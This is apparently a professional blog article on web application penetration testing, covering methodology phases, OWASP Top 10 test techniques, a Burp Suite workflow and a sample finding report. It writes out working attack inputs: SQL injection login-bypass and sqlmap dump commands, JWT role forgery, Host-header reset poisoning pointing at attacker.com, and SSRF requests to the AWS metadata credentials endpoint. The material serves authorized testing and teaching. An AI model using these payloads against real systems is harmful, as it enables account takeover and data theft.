// Web App Pentesting

Web Application Penetration Testing Methodology: OWASP Top 10 in Practice

📅 June 2025🕐 20 min readVAPT

Introduction

Web application penetration testing is the systematic process of probing a web application for security vulnerabilities using the same techniques adversaries use, but in an authorized, controlled manner. A professional pentest delivers more than a Nessus scan — it demonstrates exploitability, assesses real-world business impact, and provides actionable remediation guidance.

This article documents the methodology used across web application security assessments on internal and customer-facing applications, following OWASP Testing Guide v4 and PTES (Penetration Testing Execution Standard) frameworks.

Assessment Methodology

Phase 1: Reconnaissance
  - Passive recon (OSINT, DNS, certificate transparency)
  - Active recon (directory fuzzing, tech fingerprinting)
  - Mapping attack surface

Phase 2: Vulnerability Discovery
  - Automated scanning (Burp Scanner, Nuclei)
  - Manual testing per OWASP Testing Guide
  - Business logic testing (manual only)

Phase 3: Exploitation
  - Confirm exploitability of each finding
  - Chain vulnerabilities for impact demonstration
  - Document proof of concept

Phase 4: Reporting
  - Risk rating per CVSS 3.1
  - Executive summary + technical details
  - Remediation guidance per vulnerability

OWASP Top 10 Testing Techniques

A01 - Broken Access Control

# Test 1: IDOR
GET /api/orders/10001  (your order)
GET /api/orders/10002  (try neighboring order)
GET /api/orders/1      (try admin/first order)

# Test 2: Forced browsing
# Use Burp Intruder or ffuf to enumerate admin paths
ffuf -u https://target.com/admin/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200,301,302

# Test 3: JWT manipulation
# Decode JWT, change user role to admin, re-encode
import jwt
payload = jwt.decode(token, options={"verify_signature": False})
payload['role'] = 'admin'
new_token = jwt.encode(payload, key='', algorithm='HS256')

A03 - SQL Injection

# Manual testing - basic SQLi
# Test each input for SQLi using single quote
POST /login
username=admin'-- -&password=anything

# Time-based blind SQLi
username=admin' AND SLEEP(5)-- -

# Automated with SQLMap
sqlmap -u "https://target.com/profile?id=1"   --cookie="session=abc123"   --level=3 --risk=2   --dbs  # Enumerate databases
  --dump -D targetdb -T users  # Dump users table

A07 - Identification and Authentication Failures

# Test 1: Account enumeration
curl -s -o /dev/null -w "%{http_code}" https://target.com/login -d "user=admin&pass=wrong"
curl -s -o /dev/null -w "%{http_code}" https://target.com/login -d "user=notexist&pass=wrong"
# Different response times/codes = user enumeration

# Test 2: Password reset poisoning
POST /reset-password
Host: attacker.com  # Host header injection
email=victim@company.com
# If reset link uses Host header, attacker receives reset link

# Test 3: Session token analysis (Burp Sequencer)
# Check entropy of session tokens

A10 - Server-Side Request Forgery (SSRF)

# SSRF via URL parameter
POST /api/webhook
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
# AWS metadata service - can expose IAM credentials

# SSRF bypass techniques:
# - Use 127.0.0.1 instead of localhost
# - Use 0.0.0.0, ::1
# - URL encoding: http://%31%32%37%2E%30%2E%30%2E%31/
# - DNS rebinding for bypassing IP blacklists

Burp Suite Professional Workflow

Burp Suite Pro is the industry standard for web application testing. Our standard engagement workflow:

  1. Passive Crawl - Browse application through Burp Proxy to populate sitemap
  2. Active Scan - Run Burp Scanner on all in-scope targets
  3. Manual Testing - Focus on authentication, authorization, business logic
  4. Intruder - Brute force, fuzzing, IDOR enumeration
  5. Repeater - Manual exploitation and PoC development
  6. Extensions - AuthMatrix (IDOR/access control), Param Miner (hidden params), GAP (JS endpoint extraction)

Professional Report Template

VULNERABILITY: SQL Injection in Login Form
CVSS 3.1 Score: 9.8 (Critical)
CWE: CWE-89

Description:
The application login form is vulnerable to SQL injection via the
'username' parameter. An attacker can bypass authentication entirely
and access any account including administrative accounts.

Proof of Concept:
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=admin'-- -&password=anything

Response: HTTP/1.1 302 Found (redirect to /dashboard as admin)

Impact:
Complete authentication bypass. Attacker can access any account,
exfiltrate customer data (GDPR breach), and potentially execute
OS commands via xp_cmdshell on MSSQL databases.

Remediation:
Use parameterized queries / prepared statements. Never concatenate
user input into SQL queries. Implement WAF as defense-in-depth.
VAPTOWASPBurp SuiteSQLi